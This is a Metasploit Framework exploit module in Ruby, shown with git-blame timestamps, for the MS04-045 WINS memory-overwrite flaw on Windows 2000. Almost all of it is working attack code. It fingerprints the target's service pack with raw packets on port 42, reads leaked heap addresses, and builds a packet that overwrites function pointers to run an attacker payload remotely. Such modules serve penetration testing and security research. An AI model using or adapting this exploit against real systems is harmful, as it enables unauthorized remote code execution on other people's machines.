2007-02-18 00:10:39 +00:00
|
|
|
##
|
2007-03-01 08:21:36 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
##
|
2010-04-04 04:46:28 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = GreatRanking
|
2005-11-26 04:04:49 +00:00
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
include Msf::Exploit::Remote::Tcp
|
2005-11-26 04:04:49 +00:00
|
|
|
|
|
|
|
def initialize(info = {})
|
2010-04-04 04:46:28 +00:00
|
|
|
super(update_info(info,
|
2006-09-13 06:49:39 +00:00
|
|
|
'Name' => 'Microsoft WINS Service Memory Overwrite',
|
2005-11-26 04:04:49 +00:00
|
|
|
'Description' => %q{
|
2010-04-04 04:46:28 +00:00
|
|
|
This module exploits an arbitrary memory write flaw in the
|
2005-11-26 04:04:49 +00:00
|
|
|
WINS service. This exploit has been tested against Windows
|
|
|
|
2000 only.
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
},
|
|
|
|
'Author' => [ 'hdm' ],
|
2006-01-21 22:10:20 +00:00
|
|
|
'License' => MSF_LICENSE,
|
2005-11-26 04:04:49 +00:00
|
|
|
'Version' => '$Revision$',
|
|
|
|
'References' =>
|
|
|
|
[
|
2007-01-05 14:44:09 +00:00
|
|
|
[ 'CVE', '2004-1080'],
|
2009-07-16 16:02:24 +00:00
|
|
|
[ 'OSVDB', '12378'],
|
2007-01-05 14:44:09 +00:00
|
|
|
[ 'BID', '11763'],
|
2005-11-26 04:04:49 +00:00
|
|
|
[ 'MSB', 'MS04-045'],
|
|
|
|
|
|
|
|
],
|
|
|
|
'Privileged' => true,
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'process',
|
|
|
|
},
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 8000,
|
|
|
|
'MinNops' => 512,
|
|
|
|
'StackAdjustment' => -3500,
|
|
|
|
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
2010-04-04 04:46:28 +00:00
|
|
|
[
|
2005-11-26 04:04:49 +00:00
|
|
|
'Windows 2000 English', # Tested OK - 11/25/2005 hdm
|
|
|
|
{
|
|
|
|
'Platform' => 'win',
|
|
|
|
'Rets' => [ 0x5391f40, 0x53df4c4, 0x53922e0],
|
|
|
|
},
|
|
|
|
],
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Dec 14 2004',
|
|
|
|
'DefaultTarget' => 0))
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
Opt::RPORT(42)
|
2005-12-25 22:47:38 +00:00
|
|
|
], self.class )
|
2005-11-26 04:04:49 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def check
|
|
|
|
ret = fprint()
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
info = 'This system is running '
|
2008-12-19 07:11:08 +00:00
|
|
|
info << ((ret[1] == '?') ? 'an unknown windows version ' : "Windows #{ret[1]} ")
|
2005-11-26 04:04:49 +00:00
|
|
|
info << ((ret[2] == '?') ? '' : "with service pack #{ret[2]} ")
|
|
|
|
info << (ret[3] ? '(clean heap)' : '(dirty heap)')
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
print_status(info)
|
|
|
|
return ret[0]
|
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
ret = fprint()
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
if (ret[0] != Exploit::CheckCode::Vulnerable)
|
|
|
|
print_status("This system does not appear to be vulnerable")
|
|
|
|
return
|
|
|
|
end
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Windows 2000 SP0, SP2, SP3, SP4 only. SP1 does not have the
|
|
|
|
# same function pointer...
|
|
|
|
if (ret[1] != '2000' or ret[2] !~ /^[0234]/)
|
|
|
|
print_status("This target is not currently supported")
|
|
|
|
return
|
|
|
|
end
|
|
|
|
|
|
|
|
# This flag is un-set if the first leaked address is not the default of
|
|
|
|
# 0x05371e90. This can indicate that someone has already tried to exploit
|
|
|
|
# this system, or something major happened to the heap that will probably
|
|
|
|
# prevent this exploit from working.
|
|
|
|
if (not ret[3])
|
|
|
|
print_status("Warning: the leaked heap address indicates that this attack may fail");
|
|
|
|
end
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# The base address of our structure in memory
|
|
|
|
base = target['Rets'][0]
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Address of the function pointers to overwrite (courtesy anonymous donor)
|
|
|
|
targ = target['Rets'][1]
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Address of the payload on the heap, past the structure
|
|
|
|
code = target['Rets'][2]
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Build up the wins packet
|
|
|
|
addr = ''
|
|
|
|
addr << ([code].pack('V') * 9)
|
|
|
|
addr << ([targ - 0x48].pack('V') * 14)
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
wins = addr * 10
|
|
|
|
wins << payload.encoded
|
2007-03-01 08:21:36 +00:00
|
|
|
wins << rand_text_english(9200-wins.length, payload_badchars)
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
wpkt = [wins.length + 8, -1, base].pack('NNN')
|
|
|
|
wpkt << wins
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
print_status(sprintf("Attempting to overwrite 0x%.8x with 0x%.8x (0x%.8x)", targ, code, base))
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Connect and send the request
|
|
|
|
connect
|
2010-04-04 04:46:28 +00:00
|
|
|
sock.put(wpkt)
|
2005-11-26 04:04:49 +00:00
|
|
|
handler
|
|
|
|
disconnect
|
|
|
|
end
|
|
|
|
|
|
|
|
# This fingerprinting routine will cause the structure base address to slide down
|
|
|
|
# 120 bytes. Subsequent fingerprints will not push this down any futher, however
|
|
|
|
# we need to make sure that fingerprint is always called before exploitation or
|
|
|
|
# the alignment will be way off.
|
|
|
|
def fprint
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
ret = [Exploit::CheckCode::Safe, '', '', '']
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
req = "\x00\x00\x00\x29\x00\x00\x78\x00\x00\x00\x00\x00"+
|
|
|
|
"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x02\x00\x05"+
|
|
|
|
"\x00\x00\x00\x00\x60\x56\x02\x01\x00\x1F\x6E\x03"+
|
|
|
|
"\x00\x1F\x6E\x03\x08\xFE\x66\x03\x00"
|
|
|
|
|
|
|
|
connect
|
|
|
|
sock.put(req)
|
|
|
|
data = sock.get_once
|
|
|
|
return ret if not data
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
ptrs = [ data[16,4].unpack('N')[0] ].concat( data[32,12].unpack('VVV') )
|
|
|
|
|
|
|
|
print_status(sprintf("WINS Fingerprint: [0x%.8x] 0x%.8x 0x%.8x 0x%.8x", *ptrs))
|
|
|
|
|
|
|
|
os = '2000'
|
|
|
|
sp = '?'
|
|
|
|
vi = false
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Check for Windows 2000 systems
|
|
|
|
case ptrs[3]
|
|
|
|
when 0x77f8ae78
|
|
|
|
sp = '0'
|
|
|
|
when 0x77f81f70
|
|
|
|
sp = '1'
|
|
|
|
when 0x77f82680
|
|
|
|
sp = '2'
|
|
|
|
when 0x77f83608
|
|
|
|
sp = '3'
|
|
|
|
when 0x77f89640
|
|
|
|
sp = '4'
|
|
|
|
when 0x77f82518
|
|
|
|
sp = '5'
|
|
|
|
when 0x77f81648 # Contributed by grutz[at]jingojango.net
|
|
|
|
sp = '3/4'
|
|
|
|
end
|
|
|
|
|
|
|
|
# Reset the OS string if no match was found
|
|
|
|
os = '?' if sp == '?'
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Check for Windows NT 4.0 systems
|
|
|
|
if (ptrs[0] > 0x02300000 and ptrs[0] < 0x02400000)
|
|
|
|
os = 'NT'
|
|
|
|
sp = '?'
|
|
|
|
end
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Heap is still pristine...
|
|
|
|
vi = true if ptrs[0] == 0x05371e90
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
# Determine if the patch has already been applied
|
|
|
|
req = "\x00\x00\x00\x0F\x00\x00\x78\x00" + data[16, 4] +
|
2010-09-20 08:06:27 +00:00
|
|
|
"\x00\x00\x00\x03\x00\x00\x00\x00"
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
sock.put(req)
|
|
|
|
data = sock.get_once
|
|
|
|
disconnect
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
ret[1] = os
|
|
|
|
ret[2] = sp
|
|
|
|
ret[3] = vi
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
if (data and data[6, 1] == "\x78")
|
|
|
|
ret[0] = Exploit::CheckCode::Vulnerable
|
|
|
|
end
|
2010-04-04 04:46:28 +00:00
|
|
|
|
2005-11-26 04:04:49 +00:00
|
|
|
return ret
|
|
|
|
end
|
|
|
|
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|